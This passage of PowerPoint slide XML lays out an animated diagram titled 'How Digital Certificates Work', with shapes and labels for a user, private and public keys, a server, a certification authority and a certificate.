                        <p:par>
                          <p:cTn id="68" fill="hold">
                            <p:stCondLst>
                              <p:cond delay="1000"/>
                            </p:stCondLst>
                            <p:childTnLst>
                              <p:par>
                                <p:cTn id="69" presetClass="entr" nodeType="afterEffect" presetID="9" grpId="16" fill="hold">
                                  <p:stCondLst>
                                    <p:cond delay="0"/>
                                  </p:stCondLst>
                                  <p:iterate type="el" backwards="0">
                                    <p:tmAbs val="0"/>
                                  </p:iterate>
                                  <p:childTnLst>
                                    <p:set>
                                      <p:cBhvr>
                                        <p:cTn id="70" fill="hold"/>
                                        <p:tgtEl>
                                          <p:spTgt spid="922"/>
                                        </p:tgtEl>
                                        <p:attrNameLst>
                                          <p:attrName>style.visibility</p:attrName>
                                        </p:attrNameLst>
                                      </p:cBhvr>
                                      <p:to>
                                        <p:strVal val="visible"/>
                                      </p:to>
                                    </p:set>
                                    <p:animEffect filter="dissolve" transition="in">
                                      <p:cBhvr>
                                        <p:cTn id="71" dur="500"/>
                                        <p:tgtEl>
                                          <p:spTgt spid="922"/>
                                        </p:tgtEl>
                                      </p:cBhvr>
                                    </p:animEffect>
                                  </p:childTnLst>
                                </p:cTn>
                              </p:par>
                            </p:childTnLst>
                          </p:cTn>
                        </p:par>
                        <p:par>
                          <p:cTn id="72" fill="hold">
                            <p:stCondLst>
                              <p:cond delay="1500"/>
                            </p:stCondLst>
                            <p:childTnLst>
                              <p:par>
                                <p:cTn id="73" presetClass="entr" nodeType="afterEffect" presetSubtype="32" presetID="4" grpId="17" fill="hold">
                                  <p:stCondLst>
                                    <p:cond delay="0"/>
                                  </p:stCondLst>
                                  <p:iterate type="el" backwards="0">
                                    <p:tmAbs val="0"/>
                                  </p:iterate>
                                  <p:childTnLst>
                                    <p:set>
                                      <p:cBhvr>
                                        <p:cTn id="74" fill="hold"/>
                                        <p:tgtEl>
                                          <p:spTgt spid="936"/>
                                        </p:tgtEl>
                                        <p:attrNameLst>
                                          <p:attrName>style.visibility</p:attrName>
                                        </p:attrNameLst>
                                      </p:cBhvr>
                                      <p:to>
                                        <p:strVal val="visible"/>
                                      </p:to>
                                    </p:set>
                                    <p:animEffect filter="box(out)" transition="in">
                                      <p:cBhvr>
                                        <p:cTn id="75" dur="500"/>
                                        <p:tgtEl>
                                          <p:spTgt spid="936"/>
                                        </p:tgtEl>
                                      </p:cBhvr>
                                    </p:animEffect>
                                  </p:childTnLst>
                                </p:cTn>
                              </p:par>
                            </p:childTnLst>
                          </p:cTn>
                        </p:par>
                        <p:par>
                          <p:cTn id="76" fill="hold">
                            <p:stCondLst>
                              <p:cond delay="2000"/>
                            </p:stCondLst>
                            <p:childTnLst>
                              <p:par>
                                <p:cTn id="77" presetClass="entr" nodeType="afterEffect" presetSubtype="0" presetID="1" grpId="18" fill="hold">
                                  <p:stCondLst>
                                    <p:cond delay="0"/>
                                  </p:stCondLst>
                                  <p:iterate type="el" backwards="0">
                                    <p:tmAbs val="0"/>
                                  </p:iterate>
                                  <p:childTnLst>
                                    <p:set>
                                      <p:cBhvr>
                                        <p:cTn id="78" fill="hold"/>
                                        <p:tgtEl>
                                          <p:spTgt spid="9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93" grpId="7"/>
      <p:bldP build="whole" bldLvl="1" animBg="1" rev="0" advAuto="0" spid="930" grpId="14"/>
      <p:bldP build="whole" bldLvl="1" animBg="1" rev="0" advAuto="0" spid="922" grpId="16"/>
      <p:bldP build="whole" bldLvl="1" animBg="1" rev="0" advAuto="0" spid="940" grpId="6"/>
      <p:bldP build="whole" bldLvl="1" animBg="1" rev="0" advAuto="0" spid="933" grpId="13"/>
      <p:bldP build="whole" bldLvl="1" animBg="1" rev="0" advAuto="0" spid="927" grpId="15"/>
      <p:bldP build="whole" bldLvl="1" animBg="1" rev="0" advAuto="0" spid="923" grpId="11"/>
      <p:bldP build="whole" bldLvl="1" animBg="1" rev="0" advAuto="0" spid="910" grpId="5"/>
      <p:bldP build="whole" bldLvl="1" animBg="1" rev="0" advAuto="0" spid="909" grpId="1"/>
      <p:bldP build="whole" bldLvl="1" animBg="1" rev="0" advAuto="0" spid="913" grpId="4"/>
      <p:bldP build="whole" bldLvl="1" animBg="1" rev="0" advAuto="0" spid="919" grpId="8"/>
      <p:bldP build="whole" bldLvl="1" animBg="1" rev="0" advAuto="0" spid="926" grpId="12"/>
      <p:bldP build="whole" bldLvl="1" animBg="1" rev="0" advAuto="0" spid="903" grpId="3"/>
      <p:bldP build="whole" bldLvl="1" animBg="1" rev="0" advAuto="0" spid="936" grpId="17"/>
      <p:bldP build="whole" bldLvl="1" animBg="1" rev="0" advAuto="0" spid="949" grpId="18"/>
      <p:bldP build="whole" bldLvl="1" animBg="1" rev="0" advAuto="0" spid="953" grpId="10"/>
      <p:bldP build="whole" bldLvl="1" animBg="1" rev="0" advAuto="0" spid="914" grpId="9"/>
      <p:bldP build="whole" bldLvl="1" animBg="1" rev="0" advAuto="0" spid="906" grpId="2"/>
    </p:bldLst>
  </p:timing>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5" name="How Digital Certificates Work"/>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How Digital Certificates Work</a:t>
            </a:r>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="956" name="Line"/>
          <p:cNvSpPr/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="3684485" y="3876550"/>
            <a:ext cx="5071177" cy="808339"/>
          </a:xfrm>
          <a:prstGeom prst="line">
            <a:avLst/>
          </a:prstGeom>
          <a:ln w="76200">
            <a:solidFill>
              <a:srgbClr val="000000"/>
            </a:solidFill>
            <a:prstDash val="sysDot"/>
          </a:ln>
        </p:spPr>
        <p:txBody>
          <a:bodyPr lIns="65023" tIns="65023" rIns="65023" bIns="65023"/>
          <a:lstStyle/>
          <a:p>
            <a:pPr algn="l" defTabSz="650240">
              <a:defRPr sz="1600">
                <a:latin typeface="Helvetica"/>
                <a:ea typeface="Helvetica"/>
                <a:cs typeface="Helvetica"/>
                <a:sym typeface="Helvetica"/>
              </a:defRPr>
            </a:pPr>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="957" name="Oval"/>
          <p:cNvSpPr/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="91649" y="2724686"/>
            <a:ext cx="2639305" cy="1910984"/>
          </a:xfrm>
          <a:prstGeom prst="ellipse">
            <a:avLst/>
          </a:prstGeom>
          <a:gradFill>
            <a:gsLst>
              <a:gs pos="0">
                <a:srgbClr val="F0F1FF"/>
              </a:gs>
              <a:gs pos="100000">
                <a:srgbClr val="B3C8DF"/>
              </a:gs>
            </a:gsLst>
            <a:path path="circle">
              <a:fillToRect l="37721" t="-19636" r="62278" b="119636"/>
            </a:path>
          </a:gradFill>
          <a:ln w="12700">
            <a:miter lim="400000"/>
          </a:ln>
          <a:effectLst>
            <a:outerShdw sx="100000" sy="100000" kx="0" ky="0" algn="b" rotWithShape="0" blurRad="88900" dist="50800" dir="2700000">
              <a:srgbClr val="ADADAD"/>
            </a:outerShdw>
          </a:effectLst>
        </p:spPr>
        <p:txBody>
          <a:bodyPr lIns="65023" tIns="65023" rIns="65023" bIns="65023" anchor="ctr"/>
          <a:lstStyle/>
          <a:p>
            <a:pPr algn="l" defTabSz="1300480">
              <a:lnSpc>
                <a:spcPct val="90000"/>
              </a:lnSpc>
              <a:spcBef>
                <a:spcPts val="1200"/>
              </a:spcBef>
              <a:defRPr sz="2400">
                <a:latin typeface="Arial Narrow"/>
                <a:ea typeface="Arial Narrow"/>
                <a:cs typeface="Arial Narrow"/>
                <a:sym typeface="Arial Narrow"/>
              </a:defRPr>
            </a:pPr>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:pic>
        <p:nvPicPr>
          <p:cNvPr id="958" name="User_UserE01" descr="User_UserE01"/>
          <p:cNvPicPr>
            <a:picLocks noChangeAspect="1"/>
          </p:cNvPicPr>
          <p:nvPr/>
        </p:nvPicPr>
        <p:blipFill>
          <a:blip r:embed="rId3">
            <a:extLst/>
          </a:blip>
          <a:stretch>
            <a:fillRect/>
          </a:stretch>
        </p:blipFill>
        <p:spPr>
          <a:xfrm>
            <a:off x="370779" y="2296159"/>
            <a:ext cx="900854" cy="2045548"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
          <a:ln w="12700">
            <a:miter lim="400000"/>
          </a:ln>
        </p:spPr>
      </p:pic>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="959" name="Private Key"/>
          <p:cNvSpPr txBox="1"/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="1736400" y="1613182"/>
            <a:ext cx="1277903" cy="408229"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
          <a:ln w="12700">
            <a:miter lim="400000"/>
          </a:ln>
          <a:extLst>
            <a:ext uri="{C572A759-6A51-4108-AA02-DFA0A04FC94B}">
              <ma14:wrappingTextBoxFlag xmlns:ma14="http://schemas.microsoft.com/office/mac/drawingml/2011/main" val="1"/>
            </a:ext>
          </a:extLst>
        </p:spPr>
        <p:txBody>
          <a:bodyPr lIns="39014" tIns="39014" rIns="39014" bIns="39014">
            <a:spAutoFit/>
          </a:bodyPr>
          <a:lstStyle>
            <a:lvl1pPr defTabSz="1300480">
              <a:defRPr sz="2200">
                <a:latin typeface="Arial Narrow"/>
                <a:ea typeface="Arial Narrow"/>
                <a:cs typeface="Arial Narrow"/>
                <a:sym typeface="Arial Narrow"/>
              </a:defRPr>
            </a:lvl1pPr>
          </a:lstStyle>
          <a:p>
            <a:pPr>
              <a:defRPr sz="2400"/>
            </a:pPr>
            <a:r>
              <a:rPr sz="2200"/>
              <a:t>Private Key</a:t>
            </a:r>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:pic>
        <p:nvPicPr>
          <p:cNvPr id="960" name="Key_Private01" descr="Key_Private01"/>
          <p:cNvPicPr>
            <a:picLocks noChangeAspect="1"/>
          </p:cNvPicPr>
          <p:nvPr/>
        </p:nvPicPr>
        <p:blipFill>
          <a:blip r:embed="rId4">
            <a:extLst/>
          </a:blip>
          <a:stretch>
            <a:fillRect/>
          </a:stretch>
        </p:blipFill>
        <p:spPr>
          <a:xfrm>
            <a:off x="2185697" y="2385342"/>
            <a:ext cx="756357" cy="1526258"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
          <a:ln w="12700">
            <a:miter lim="400000"/>
          </a:ln>
        </p:spPr>
      </p:pic>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="961" name="User"/>
          <p:cNvSpPr txBox="1"/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="486033" y="1780048"/>
            <a:ext cx="670345" cy="472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1300480">
              <a:defRPr sz="2400">
                <a:latin typeface="Arial Narrow"/>
                <a:ea typeface="Arial Narrow"/>
                <a:cs typeface="Arial Narrow"/>
                <a:sym typeface="Arial Narrow"/>
              </a:defRPr>
            </a:lvl1pPr>
          </a:lstStyle>
          <a:p>
            <a:pPr/>
            <a:r>
              <a:t>User</a:t>
            </a:r>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:pic>
        <p:nvPicPr>
          <p:cNvPr id="962" name="Server01" descr="Server01"/>
          <p:cNvPicPr>
            <a:picLocks noChangeAspect="1"/>
          </p:cNvPicPr>
          <p:nvPr/>
        </p:nvPicPr>
        <p:blipFill>
          <a:blip r:embed="rId5">
            <a:extLst/>
          </a:blip>
          <a:stretch>
            <a:fillRect/>
          </a:stretch>
        </p:blipFill>
        <p:spPr>
          <a:xfrm>
            <a:off x="8606649" y="3928533"/>
            <a:ext cx="2246490" cy="2643859"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
          <a:ln w="12700">
            <a:miter lim="400000"/>
          </a:ln>
        </p:spPr>
      </p:pic>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="963" name="Certification Authority"/>
          <p:cNvSpPr txBox="1"/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="9274171" y="6533775"/>
            <a:ext cx="2253264" cy="815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1300480">
              <a:defRPr sz="2400">
                <a:latin typeface="Arial Narrow"/>
                <a:ea typeface="Arial Narrow"/>
                <a:cs typeface="Arial Narrow"/>
                <a:sym typeface="Arial Narrow"/>
              </a:defRPr>
            </a:lvl1pPr>
          </a:lstStyle>
          <a:p>
            <a:pPr/>
            <a:r>
              <a:t>Certification Authority</a:t>
            </a:r>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:pic>
        <p:nvPicPr>
          <p:cNvPr id="964" name="Certificate01" descr="Certificate01"/>
          <p:cNvPicPr>
            <a:picLocks noChangeAspect="1"/>
          </p:cNvPicPr>
          <p:nvPr/>
        </p:nvPicPr>
        <p:blipFill>
          <a:blip r:embed="rId6">
            <a:extLst/>
          </a:blip>
          <a:stretch>
            <a:fillRect/>
          </a:stretch>
        </p:blipFill>
        <p:spPr>
          <a:xfrm>
            <a:off x="5187986" y="4236720"/>
            <a:ext cx="1189850" cy="1280161"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
          <a:ln w="12700">
            <a:miter lim="400000"/>
          </a:ln>
        </p:spPr>
      </p:pic>
      <p:pic>
        <p:nvPicPr>
          <p:cNvPr id="965" name="Key_Public01" descr="Key_Public01"/>
          <p:cNvPicPr>
            <a:picLocks noChangeAspect="1"/>
          </p:cNvPicPr>
          <p:nvPr/>
        </p:nvPicPr>
        <p:blipFill>
          <a:blip r:embed="rId7">
            <a:extLst/>
          </a:blip>
          <a:stretch>
            <a:fillRect/>
          </a:stretch>
        </p:blipFill>
        <p:spPr>
          <a:xfrm>
            <a:off x="2711760" y="2714977"/>
            <a:ext cx="806027" cy="1589477"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
          <a:ln w="12700">
            <a:miter lim="400000"/>
          </a:ln>
        </p:spPr>
      </p:pic>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="966" name="Public Key"/>
          <p:cNvSpPr txBox="1"/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="3525646" y="2784336"/>
            <a:ext cx="1133406" cy="738430"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
          <a:ln w="12700">
            <a:miter lim="400000"/>
          </a:ln>
          <a:extLst>
            <a:ext uri="{C572A759-6A51-4108-AA02-DFA0A04FC94B}">
              <ma14:wrappingTextBoxFlag xmlns:ma14="http://schemas.microsoft.com/office/mac/drawingml/2011/main" val="1"/>
            </a:ext>
          </a:extLst>
        </p:spPr>
        <p:txBody>
          <a:bodyPr lIns="39014" tIns="39014" rIns="39014" bIns="39014">
            <a:spAutoFit/>
          </a:bodyPr>
          <a:lstStyle>
            <a:lvl1pPr algn="l" defTabSz="1300480">
              <a:defRPr sz="2200">
                <a:latin typeface="Arial Narrow"/>
                <a:ea typeface="Arial Narrow"/>
                <a:cs typeface="Arial Narrow"/>
                <a:sym typeface="Arial Narrow"/>
              </a:defRPr>
            </a:lvl1pPr>
          </a:lstStyle>
          <a:p>
            <a:pPr>
              <a:defRPr sz="2400"/>
            </a:pPr>
            <a:r>
              <a:rPr sz="2200"/>
              <a:t>Public Key</a:t>
            </a:r>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:grpSp>
        <p:nvGrpSpPr>
          <p:cNvPr id="971" name="Group"/>
          <p:cNvGrpSpPr/>
          <p:nvPr/>
        </p:nvGrpSpPr>
        <p:grpSpPr>
          <a:xfrm>
            <a:off x="866986" y="8606649"/>
            <a:ext cx="1300481" cy="605085"/>
            <a:chOff x="0" y="0"/>
            <a:chExt cx="1300480" cy="605084"/>
          </a:xfrm>
        </p:grpSpPr>
        <p:sp>
          <p:nvSpPr>
            <p:cNvPr id="967" name="Oval"/>
            <p:cNvSpPr/>
            <p:nvPr/>
          </p:nvSpPr>
          <p:spPr>
            <a:xfrm>
              <a:off x="0" y="0"/>
              <a:ext cx="1300481" cy="605085"/>
            </a:xfrm>
            <a:prstGeom prst="ellipse">
              <a:avLst/>
            </a:prstGeom>
            <a:gradFill flip="none" rotWithShape="1">
              <a:gsLst>
                <a:gs pos="0">
                  <a:srgbClr val="99CCFF"/>
                </a:gs>
                <a:gs pos="100000">
                  <a:srgbClr val="666699"/>
                </a:gs>
              </a:gsLst>
              <a:lin ang="16200000" scaled="0"/>
            </a:gradFill>
            <a:ln w="12700" cap="flat">
              <a:noFill/>
              <a:miter lim="400000"/>
            </a:ln>
            <a:effectLst>
              <a:outerShdw sx="100000" sy="100000" kx="0" ky="0" algn="b" rotWithShape="0" blurRad="88900" dist="25400" dir="2700000">
                <a:srgbClr val="969696"/>
              </a:outerShdw>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grpSp>
          <p:nvGrpSpPr>
            <p:cNvPr id="970" name="Group"/>
            <p:cNvGrpSpPr/>
            <p:nvPr/>
          </p:nvGrpSpPr>
          <p:grpSpPr>
            <a:xfrm>
              <a:off x="173397" y="129660"/>
              <a:ext cx="433494" cy="345764"/>
              <a:chOff x="0" y="0"/>
              <a:chExt cx="433493" cy="345762"/>
            </a:xfrm>
          </p:grpSpPr>
          <p:sp>
            <p:nvSpPr>
              <p:cNvPr id="968" name="Oval"/>
              <p:cNvSpPr/>
              <p:nvPr/>
            </p:nvSpPr>
            <p:spPr>
              <a:xfrm>
                <a:off x="0" y="0"/>
                <a:ext cx="433494" cy="345763"/>
              </a:xfrm>
              <a:prstGeom prst="ellipse">
                <a:avLst/>
              </a:prstGeom>
              <a:gradFill flip="none" rotWithShape="1">
                <a:gsLst>
                  <a:gs pos="0">
                    <a:srgbClr val="99CCFF"/>
                  </a:gs>
                  <a:gs pos="100000">
                    <a:srgbClr val="666699"/>
                  </a:gs>
                </a:gsLst>
                <a:lin ang="8100000" scaled="0"/>
              </a:gradFill>
              <a:ln w="12700" cap="flat">
                <a:noFill/>
                <a:miter lim="400000"/>
              </a:ln>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sp>
            <p:nvSpPr>
              <p:cNvPr id="969" name="Shape"/>
              <p:cNvSpPr/>
              <p:nvPr/>
            </p:nvSpPr>
            <p:spPr>
              <a:xfrm>
                <a:off x="106567" y="48622"/>
                <a:ext cx="251066" cy="2395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4550" y="8475"/>
                      <a:pt x="0" y="21600"/>
                    </a:cubicBezTo>
                    <a:cubicBezTo>
                      <a:pt x="10800" y="16200"/>
                      <a:pt x="21600" y="10800"/>
                      <a:pt x="21600" y="10800"/>
                    </a:cubicBezTo>
                    <a:lnTo>
                      <a:pt x="0" y="0"/>
                    </a:lnTo>
                    <a:close/>
                  </a:path>
                </a:pathLst>
              </a:custGeom>
              <a:gradFill flip="none" rotWithShape="1">
                <a:gsLst>
                  <a:gs pos="0">
                    <a:srgbClr val="FFCC66"/>
                  </a:gs>
                  <a:gs pos="100000">
                    <a:srgbClr val="FFFFCC"/>
                  </a:gs>
                </a:gsLst>
                <a:lin ang="8100000" scaled="0"/>
              </a:gradFill>
              <a:ln w="12700" cap="flat">
                <a:solidFill>
                  <a:srgbClr val="666699"/>
                </a:solidFill>
                <a:prstDash val="solid"/>
                <a:round/>
              </a:ln>
              <a:effectLst>
                <a:outerShdw sx="100000" sy="100000" kx="0" ky="0" algn="b" rotWithShape="0" blurRad="88900" dist="25400" dir="8100000">
                  <a:srgbClr val="000000"/>
                </a:outerShdw>
              </a:effectLst>
            </p:spPr>
            <p:txBody>
              <a:bodyPr wrap="square" lIns="65023" tIns="65023" rIns="65023" bIns="65023" numCol="1" anchor="ctr">
                <a:noAutofit/>
              </a:bodyPr>
              <a:lstStyle/>
              <a:p>
                <a:pPr algn="l" defTabSz="1300480">
                  <a:lnSpc>
                    <a:spcPct val="90000"/>
                  </a:lnSpc>
                  <a:spcBef>
                    <a:spcPts val="1300"/>
                  </a:spcBef>
                  <a:defRPr b="1" sz="2800">
                    <a:latin typeface="Arial Narrow"/>
                    <a:ea typeface="Arial Narrow"/>
                    <a:cs typeface="Arial Narrow"/>
                    <a:sym typeface="Arial Narrow"/>
                  </a:defRPr>
                </a:pPr>
              </a:p>
            </p:txBody>
          </p:sp>
        </p:grpSp>
      </p:grpSp>
      <p:grpSp>
        <p:nvGrpSpPr>
          <p:cNvPr id="974" name="Group"/>
          <p:cNvGrpSpPr/>
          <p:nvPr/>
        </p:nvGrpSpPr>
        <p:grpSpPr>
          <a:xfrm>
            <a:off x="1560124" y="8735341"/>
            <a:ext cx="433494" cy="347699"/>
            <a:chOff x="0" y="0"/>
            <a:chExt cx="433493" cy="347697"/>
          </a:xfrm>
        </p:grpSpPr>
        <p:sp>
          <p:nvSpPr>
            <p:cNvPr id="972" name="Oval"/>
            <p:cNvSpPr/>
            <p:nvPr/>
          </p:nvSpPr>
          <p:spPr>
            <a:xfrm>
              <a:off x="0" y="0"/>
              <a:ext cx="433494" cy="347698"/>
            </a:xfrm>
            <a:prstGeom prst="ellipse">
              <a:avLst/>
            </a:prstGeom>
            <a:gradFill flip="none" rotWithShape="1">
              <a:gsLst>
                <a:gs pos="0">
                  <a:srgbClr val="99CCFF"/>
                </a:gs>
                <a:gs pos="100000">
                  <a:srgbClr val="666699"/>
                </a:gs>
              </a:gsLst>
              <a:lin ang="8100000" scaled="0"/>
            </a:gradFill>
            <a:ln w="12700" cap="flat">
              <a:noFill/>
              <a:miter lim="400000"/>
            </a:ln>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sp>
          <p:nvSpPr>
            <p:cNvPr id="973" name="Square"/>
            <p:cNvSpPr/>
            <p:nvPr/>
          </p:nvSpPr>
          <p:spPr>
            <a:xfrm>
              <a:off x="131854" y="88735"/>
              <a:ext cx="171592" cy="173850"/>
            </a:xfrm>
            <a:prstGeom prst="rect">
              <a:avLst/>
            </a:prstGeom>
            <a:gradFill flip="none" rotWithShape="1">
              <a:gsLst>
                <a:gs pos="0">
                  <a:srgbClr val="FFCC66"/>
                </a:gs>
                <a:gs pos="100000">
                  <a:srgbClr val="FFFFCC"/>
                </a:gs>
              </a:gsLst>
              <a:lin ang="8100000" scaled="0"/>
            </a:gradFill>
            <a:ln w="12700" cap="flat">
              <a:solidFill>
                <a:srgbClr val="666699"/>
              </a:solidFill>
              <a:prstDash val="solid"/>
              <a:round/>
            </a:ln>
            <a:effectLst>
              <a:outerShdw sx="100000" sy="100000" kx="0" ky="0" algn="b" rotWithShape="0" blurRad="88900" dist="25400" dir="8100000">
                <a:srgbClr val="000000"/>
              </a:outerShdw>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grpSp>
      <p:grpSp>
        <p:nvGrpSpPr>
          <p:cNvPr id="991" name="Group"/>
          <p:cNvGrpSpPr/>
          <p:nvPr/>
        </p:nvGrpSpPr>
        <p:grpSpPr>
          <a:xfrm>
            <a:off x="11168515" y="1085963"/>
            <a:ext cx="1758810" cy="6389513"/>
            <a:chOff x="0" y="0"/>
            <a:chExt cx="1758808" cy="6389511"/>
          </a:xfrm>
        </p:grpSpPr>
        <p:sp>
          <p:nvSpPr>
            <p:cNvPr id="975" name="Rectangle"/>
            <p:cNvSpPr/>
            <p:nvPr/>
          </p:nvSpPr>
          <p:spPr>
            <a:xfrm>
              <a:off x="0" y="0"/>
              <a:ext cx="1758809" cy="6389512"/>
            </a:xfrm>
            <a:prstGeom prst="rect">
              <a:avLst/>
            </a:prstGeom>
            <a:solidFill>
              <a:srgbClr val="FFFFCC"/>
            </a:solidFill>
            <a:ln w="12700" cap="flat">
              <a:solidFill>
                <a:srgbClr val="000000"/>
              </a:solidFill>
              <a:prstDash val="solid"/>
              <a:round/>
            </a:ln>
            <a:effectLst/>
          </p:spPr>
          <p:txBody>
            <a:bodyPr wrap="square" lIns="65023" tIns="65023" rIns="65023" bIns="65023" numCol="1" anchor="ctr">
              <a:noAutofit/>
            </a:bodyPr>
            <a:lstStyle/>
            <a:p>
              <a:pPr defTabSz="1300480">
                <a:defRPr b="1" sz="1800">
                  <a:solidFill>
                    <a:srgbClr val="808080"/>
                  </a:solidFill>
                  <a:latin typeface="Arial"/>
                  <a:ea typeface="Arial"/>
                  <a:cs typeface="Arial"/>
                  <a:sym typeface="Arial"/>
                </a:defRPr>
              </a:pPr>
            </a:p>
          </p:txBody>
        </p:sp>
        <p:sp>
          <p:nvSpPr>
            <p:cNvPr id="976" name="Line"/>
            <p:cNvSpPr/>
            <p:nvPr/>
          </p:nvSpPr>
          <p:spPr>
            <a:xfrm>
              <a:off x="24835" y="2054577"/>
              <a:ext cx="1702366" cy="1"/>
            </a:xfrm>
            <a:prstGeom prst="line">
              <a:avLst/>
            </a:prstGeom>
            <a:noFill/>
            <a:ln w="12700" cap="flat">
              <a:solidFill>
                <a:srgbClr val="808080"/>
              </a:solidFill>
              <a:prstDash val="solid"/>
              <a:round/>
            </a:ln>
            <a:effectLst/>
          </p:spPr>
          <p:txBody>
            <a:bodyPr wrap="square" lIns="65023" tIns="65023" rIns="65023" bIns="65023" numCol="1" anchor="t">
              <a:noAutofit/>
            </a:bodyPr>
            <a:lstStyle/>
            <a:p>
              <a:pPr algn="l" defTabSz="650240">
                <a:defRPr sz="1600">
                  <a:latin typeface="Helvetica"/>
                  <a:ea typeface="Helvetica"/>
                  <a:cs typeface="Helvetica"/>
                  <a:sym typeface="Helvetica"/>
                </a:defRPr>
              </a:pPr>
            </a:p>
          </p:txBody>
        </p:sp>
        <p:sp>
          <p:nvSpPr>
            <p:cNvPr id="977" name="Line"/>
            <p:cNvSpPr/>
            <p:nvPr/>
          </p:nvSpPr>
          <p:spPr>
            <a:xfrm>
              <a:off x="24835" y="2921564"/>
              <a:ext cx="1702366" cy="1"/>
            </a:xfrm>
            <a:prstGeom prst="line">
              <a:avLst/>
            </a:prstGeom>
            <a:noFill/>
            <a:ln w="12700" cap="flat">
              <a:solidFill>
                <a:srgbClr val="808080"/>
              </a:solidFill>
              <a:prstDash val="solid"/>
              <a:round/>
            </a:ln>
            <a:effectLst/>
          </p:spPr>
          <p:txBody>
            <a:bodyPr wrap="square" lIns="65023" tIns="65023" rIns="65023" bIns="65023" numCol="1" anchor="t">
              <a:noAutofit/>
            </a:bodyPr>
            <a:lstStyle/>
            <a:p>
              <a:pPr algn="l" defTabSz="650240">
                <a:defRPr sz="1600">
                  <a:latin typeface="Helvetica"/>
                  <a:ea typeface="Helvetica"/>
                  <a:cs typeface="Helvetica"/>
                  <a:sym typeface="Helvetica"/>
                </a:defRPr>
              </a:pPr>
            </a:p>
          </p:txBody>
        </p:sp>
        <p:sp>
          <p:nvSpPr>
            <p:cNvPr id="978" name="Line"/>
            <p:cNvSpPr/>
            <p:nvPr/>
          </p:nvSpPr>
          <p:spPr>
            <a:xfrm>
              <a:off x="24835" y="4330417"/>
              <a:ext cx="1702366" cy="1"/>
            </a:xfrm>
            <a:prstGeom prst="line">
              <a:avLst/>
            </a:prstGeom>
            <a:noFill/>
            <a:ln w="12700" cap="flat">
              <a:solidFill>
                <a:srgbClr val="808080"/>
              </a:solidFill>
              <a:prstDash val="solid"/>
              <a:round/>
            </a:ln>
            <a:effectLst/>
          </p:spPr>
          <p:txBody>
            <a:bodyPr wrap="square" lIns="65023" tIns="65023" rIns="65023" bIns="65023" numCol="1" anchor="t">
              <a:noAutofit/>
            </a:bodyPr>
            <a:lstStyle/>
            <a:p>
              <a:pPr algn="l" defTabSz="650240">
                <a:defRPr sz="1600">
                  <a:latin typeface="Helvetica"/>
                  <a:ea typeface="Helvetica"/>
                  <a:cs typeface="Helvetica"/>
                  <a:sym typeface="Helvetica"/>
                </a:defRPr>
              </a:pPr>
            </a:p>
          </p:txBody>
        </p:sp>
        <p:sp>
          <p:nvSpPr>
            <p:cNvPr id="979" name="Line"/>
            <p:cNvSpPr/>
            <p:nvPr/>
          </p:nvSpPr>
          <p:spPr>
            <a:xfrm>
              <a:off x="24835" y="5089031"/>
              <a:ext cx="1702366" cy="1"/>
            </a:xfrm>
            <a:prstGeom prst="line">
              <a:avLst/>
            </a:prstGeom>
            <a:noFill/>
            <a:ln w="12700" cap="flat">
              <a:solidFill>
                <a:srgbClr val="808080"/>
              </a:solidFill>
              <a:prstDash val="solid"/>
              <a:round/>
            </a:ln>
            <a:effectLst/>
          </p:spPr>
          <p:txBody>
            <a:bodyPr wrap="square" lIns="65023" tIns="65023" rIns="65023" bIns="65023" numCol="1" anchor="t">
              <a:noAutofit/>
            </a:bodyPr>
            <a:lstStyle/>
            <a:p>
              <a:pPr algn="l" defTabSz="650240">
                <a:defRPr sz="1600">
                  <a:latin typeface="Helvetica"/>
                  <a:ea typeface="Helvetica"/>
                  <a:cs typeface="Helvetica"/>
                  <a:sym typeface="Helvetica"/>
                </a:defRPr>
              </a:pPr>
            </a:p>
          </p:txBody>
        </p:sp>
        <p:sp>
          <p:nvSpPr>
            <p:cNvPr id="980" name="User Name"/>
            <p:cNvSpPr txBox="1"/>
            <p:nvPr/>
          </p:nvSpPr>
          <p:spPr>
            <a:xfrm>
              <a:off x="133208" y="645724"/>
              <a:ext cx="1177365" cy="3870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1800">
                  <a:latin typeface="Times New Roman"/>
                  <a:ea typeface="Times New Roman"/>
                  <a:cs typeface="Times New Roman"/>
                  <a:sym typeface="Times New Roman"/>
                </a:defRPr>
              </a:lvl1pPr>
            </a:lstStyle>
            <a:p>
              <a:pPr>
                <a:defRPr sz="2400"/>
              </a:pPr>
              <a:r>
                <a:rPr sz="1800"/>
                <a:t>User Name</a:t>
              </a:r>
            </a:p>
          </p:txBody>
        </p:sp>
        <p:sp>
          <p:nvSpPr>
            <p:cNvPr id="981" name="User’s…"/>
            <p:cNvSpPr txBox="1"/>
            <p:nvPr/>
          </p:nvSpPr>
          <p:spPr>
